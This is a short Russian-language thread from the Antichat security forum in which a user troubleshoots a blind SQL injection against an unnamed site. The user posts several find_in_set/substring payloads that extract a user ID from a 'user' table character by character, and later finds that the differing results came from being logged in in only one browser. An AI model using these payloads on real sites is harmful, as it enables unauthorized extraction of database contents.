ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

16.08.2013, 16:37
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Доброго!
Может, кто кратко даст наводку в чем разница между запросом в chrome и firefox. При выполнении запроса в chrome вида site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'1,d,2,3,4,5,6,7,8,9,a,b,c,d ,e,f')--+ выдает актуальную страницу без ошибок и редиректов, меняя шаблон site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'т,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ заведомо убирая оттуда соответствие условию происходит редирект(условие для реализации blind). Ежели точно такой же запрос отправить в FF, то в любом случае выдает валидную страницу. Те даже если сделать site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'и,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ зная точно заранее что userid=1, все равно выдает валидную страницу, хотя в шаблоне 1 отсутствует.
Конкретнее - необходимо через php curl снять разные состояния.
P.S. Заранее благодарен!
|
|
|

16.08.2013, 22:18
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Вопрос закрыт, решение найдено
|
|
|

17.08.2013, 13:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 2290
Репутация:
0
|
|
Если вопрос закрыт и решение найдено,выкладывай и сюда,мне тоже интересен этот вопрос.
|
|
|
|

26.08.2013, 12:25
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Решение в невнимательности. Просто в одном браузере был авторизован, а в другом - нет.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|